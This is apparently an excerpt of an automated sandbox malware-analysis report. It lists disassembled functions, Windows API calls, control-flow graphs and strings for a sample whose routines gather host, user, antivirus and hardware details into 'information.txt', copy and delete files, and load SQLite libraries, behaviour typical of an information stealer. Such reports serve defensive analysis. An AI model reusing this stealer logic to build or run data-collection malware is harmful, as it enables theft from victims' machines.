                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                                                                                                                        • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                                                                        • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                                                                        • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                                                                        • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                                                                        • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                                                                        • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                                                                        • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                                                                        • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                                                                        • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                                                                        • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                                                                        • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                                                                        • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                                                                        • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                                                                        • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                                                                        • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                                                                                                                        • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                                                                                                                        • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                                                                                                                        • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                                                                                                                        • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                                                                                                                        • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                                                                                                                        • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                                                                        • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                                                                        • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                                                                        • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                                                                        • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                                                                        • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                                                                        • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                                                                        • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                                                                        • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                                                                                                                        • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                                                                                                                        • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                                                                                                                        • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                                                                                                                        • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                                                                        • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                                                                        • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                                                                        • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                                                                        • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                                                                                                                        • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                                                                        • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                                                                        • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                                                                        • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                                                                        • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                                                                        • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                                                                        • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                      • API String ID: 3634126619-1014693891
                                                                                                                                                                                                                      • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                                                                                      • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98
                                                                                                                                                                                                                      Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 2124 40884c-408865 call 410795 2127 408867-40886c 2124->2127 2128 40886e-40887e call 410795 2124->2128 2129 408885-40888d call 410549 2127->2129 2133 408880 2128->2133 2134 40888f-40889f call 410795 2128->2134 2137 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 2129->2137 2133->2129 2134->2137 2140 408d72-408d96 call 402920 * 3 call 401cde 2134->2140 2172 408939-408949 CopyFileA 2137->2172 2173 408924-408936 call 410519 call 4122b0 2172->2173 2174 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 2172->2174 2173->2172 2187 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 2174->2187 2188 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 2174->2188 2221 408a60-408a79 call 402920 2187->2221 2188->2221 2231 408d4b-408d57 DeleteFileA call 402920 2221->2231 2232 408a7f-408a9a 2221->2232 2237 408d5c-408d6b call 402920 * 2 2231->2237 2240 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 2232->2240 2241 408d37-408d4a 2232->2241 2248 408d6d call 402920 2237->2248 2243 408cda-408ce7 2240->2243 2241->2231 2250 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 2243->2250 2251 408ced-408cf9 lstrlenA 2243->2251 2248->2140 2287 408ba3-408bb6 StrCmpCA 2250->2287 2288 408d97-408dd9 call 402920 * 8 2250->2288 2251->2241 2252 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 2251->2252 2264 408d2c-408d32 call 402920 2252->2264 2264->2241 2290 408bc0 2287->2290 2291 408bb8-408bbe 2287->2291 2288->2248 2293 408bc6-408bde call 410549 StrCmpCA 2290->2293 2291->2293 2299 408be0-408be6 2293->2299 2300 408be8 2293->2300 2302 408bee-408bf9 call 410549 2299->2302 2300->2302 2308 408c08-408cd5 lstrcatA * 14 call 402920 * 7 2302->2308 2309 408bfb-408c03 call 410549 2302->2309 2308->2243 2309->2308
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                                                                                                                        • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                                                                                                                        • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                                                                                                                        • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                                      • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                                                                      • API String ID: 2819533921-2709115261
                                                                                                                                                                                                                      • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                                                                                      • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98
                                                                                                                                                                                                                      Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                                                                        • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                      • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                                                      • API String ID: 2840494320-4129404369
                                                                                                                                                                                                                      • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                                                                                      • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98
                                                                                                                                                                                                                      Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
